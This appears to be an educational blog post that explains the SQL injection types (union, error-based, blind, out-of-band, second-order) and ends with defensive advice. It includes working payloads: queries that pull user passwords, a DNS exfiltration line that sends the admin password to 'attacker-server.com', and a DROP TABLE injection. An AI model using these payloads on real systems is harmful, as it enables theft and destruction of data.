Understanding SQL Injection: Types, Techniques, and Exploits

SQL injection (SQLi) is a critical web vulnerability that allows attackers to manipulate the queries an application sends to its database. By exploiting SQLi, attackers can interfere with an application’s database to retrieve, modify, or delete sensitive information. This post will explore various types of SQL injection attacks and how they function.

In-Band/Classic SQL Injection

In-Band SQL Injection is the most common form of SQLi, where attackers use the same communication channel to both initiate the attack and retrieve results. Two major methods for this type of SQLi are Union-Based SQLi and Error-Based SQLi.

1. Union-Based SQL Injection

Union-based SQL injection exploits the UNION SQL operator, which combines the results of two or more SELECT statements into a single response. This technique allows attackers to retrieve information from different tables within the database.

Key Requirements:

• The individual SELECT queries must return the same number of columns.

• Data types in each column must be compatible across the combined results.

Example of a UNION attack:

' UNION SELECT username, password FROM users--

Retrieving multiple values within a single column:

' UNION SELECT username || '~' || password FROM users--

Example of querying database type/version:

• MySQL/Microsoft SQL Server:

' UNION SELECT @@version--

• Oracle:

' UNION SELECT * FROM v$version--

2. Error-Based SQL Injection

Error-based SQL injection exploits the errors generated by the database. By inducing specific error responses, attackers can extract sensitive information, turning blind SQLi into visible forms.

Techniques:

• Triggering error messages by making the database perform impossible actions, like dividing by zero or using invalid type casting.

Example of inducing an error to retrieve data:

CAST((SELECT password FROM users) AS int)--

Blind SQL Injection

Blind SQL Injection occurs when the application is vulnerable, but does not reveal query results or error messages in the HTTP response. Instead, attackers infer data based on true or false responses, making it slower but still dangerous.

1. Boolean-Based Blind SQL Injection

Boolean-based blind SQLi relies on sending a query that forces the application to respond differently based on whether the query returns true or false.

Examples:

• True condition:

TrackingId='xyz' AND '1'='1--

• False condition:

TrackingId='xyz' AND '1'='2--

Attackers use these responses to infer data about the database. For example, extracting the first character of an admin password:

TrackingId='xyz' AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 'a'--

2. Time-Based Blind SQL Injection

In time-based blind SQLi, attackers rely on database time delays to extract information. A response delay indicates that the condition is true.

Example:

'; IF (1=1) WAITFOR DELAY '0:0:10'--

In this case, the server will wait for 10 seconds if the condition is true, confirming to the attacker that the query executed successfully.

Out-of-Band (OAST) SQL Injection

Out-of-Band SQL Injection (OAST) involves using separate channels to send and retrieve data. This is useful when traditional in-band techniques are not viable, such as when the application doesn't return query results in the HTTP response. OAST often uses DNS or HTTP requests to exfiltrate data.

Example:

'; exec master..xp_dirtree '//attacker-server.com/a'--

Another example that exfiltrates data through DNS queries:

'; declare @p varchar(1024); set @p=(SELECT password FROM users WHERE username='Administrator'); exec('master..xp_dirtree "//'+@p+'.attacker-server.com/a"')--

Second-Order SQL Injection

Second-Order SQL Injection occurs when an attacker inputs malicious SQL that is stored and later executed by the application. Unlike classic SQLi, the attack is not immediate. Instead, it targets scenarios where the injected code is triggered during subsequent operations.

For example, an attacker might inject malicious input during registration, and the application later executes this input when performing administrative tasks.

Example:

username='admin'; DROP TABLE users; --

Here, if this input is stored and later used in a different context (e.g., a database update), the malicious SQL executes, potentially deleting the users table.

Conclusion

SQL injection attacks remain one of the most severe and common web vulnerabilities. Understanding the various forms of SQL injection, including classic in-band methods (union-based and error-based), blind SQLi, out-of-band SQLi, and second-order SQLi, is crucial for securing applications against these threats. Each technique exploits different aspects of how databases process input, making it essential for developers to implement proper input validation, prepared statements, and parameterized queries to prevent SQLi attacks.